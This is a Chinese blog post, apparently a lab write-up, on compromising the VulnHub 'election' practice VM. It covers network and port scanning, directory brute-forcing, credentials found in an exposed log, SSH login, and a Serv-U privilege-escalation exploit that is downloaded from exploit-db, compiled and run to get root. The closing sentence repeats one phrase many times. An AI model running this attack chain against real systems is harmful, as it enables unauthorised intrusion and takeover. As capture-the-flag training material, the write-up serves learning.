vulnhub之election的实践

VSole2023-04-23 15:16:57

今天实践的是vulnhub的election镜像,

下载地址,https://download.vulnhub.com/election/election.7z,

用virtualbox导入,做地址扫描,

sudo netdiscover -r 192.168.0.0/24,有地址了,192就是,

再继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.192,

有web服务,做一下目录扫描,dirb http://192.168.0.192,

浏览器访问http://192.168.0.192/robots.txt,

继续做子目录扫描,dirb http://192.168.0.192/election,

浏览器访问http://192.168.0.192/election/admin/logs,

查看系统日志文件,获取到用户名密码love/P@$$w0rd@123,

ssh登录,ssh love@192.168.0.192,不是root,需要提权,

查找root权限的程序,find / -perm -u=s -type f 2>/dev/null,

网上搜索Serv-U Privilege Escalation,找到一个poc,

进入可写目录,cd /tmp,

下载源码文件,wget https://www.exploit-db.com/download/47009,

改文件名,mv 47009 47009.c,编译,gcc 47009.c -o poc,

执行,./poc,拿到新shell,确认是root,

本周的实践完成,本周的实践完成,本周的实践完成,本周的实践完成,本周的实践完成,本周的实践完成,本周的实践完成,本周的实践完成,本周的实践完成,本周的实践完成,本周的实践完成,本周的实践完成。

本作品采用《CC 协议》,转载必须注明作者和本文链接
vulnhubelection实践
2023-04-23 15:16:57
今天实践vulnhubelection镜像,下载地址,https://download.vulnhub.com/election/election.7z,用virtualbox导入,做地址扫描,sudo netdiscover -r 192.168.0.0/24,有地址了,192就是,再继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.192,有w
vulnhubFive86-1实践
2023-10-16 09:27:53
vulnhubFive86-1实践
vulnhubsar实践
2023-09-04 09:33:30
今天实践vulnhubsar镜像,
vulnhub2much实践
2023-08-14 09:40:07
vulnhub2much实践
vulnhubkatana实践
2023-07-24 09:41:01
今天实践vulnhubkatana镜像,下载地址,https://download.vulnhub.c
vulnhubCengBox实践
2023-07-17 09:23:02
今天实践vulnhubCengBox镜像,下载地址,https://download.vulnhub.com/cengbox/CengBox.ova,无法用workstation导入,用virtualbox导入成功,做地址扫描,sudo netdiscover -r 192.168.0.0/24,获取到靶机地址192.168.0.185,继续进行端口扫描,sudo nmap -sS -sV
vulnhubmhz_c1f实践
2023-07-10 14:29:56
今天实践vulnhubmhz_c1f镜像,下载地址,https://download.vulnhub.com/mhzcxf/mhz_c1f.ova.zip,无法用workstation导入,用virtualbox导入成功,做地址扫描,sudo netdiscover -r 192.168.0.0/24,获取到靶机地址192.168.0.186,继续进行端口扫描,sudo nmap -sS -
今天实践vulnhubdevrandomCTF镜像,下载地址,https://download.vul
vulnhubSumo实践
2023-06-25 09:11:24
今天实践vulnhubSumo镜像,下载地址,https://download.vulnhub.com/sumo/Sumo.zip,用workstation导入成功,做地址扫描,sudo netdiscover -r 192.168.177.0/24,获取到靶机地址192.168.177.141,继续进行端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.17
今天实践vulnhubLemonSqueezy镜像,下载地址,https://download.vul
VSole
网络安全专家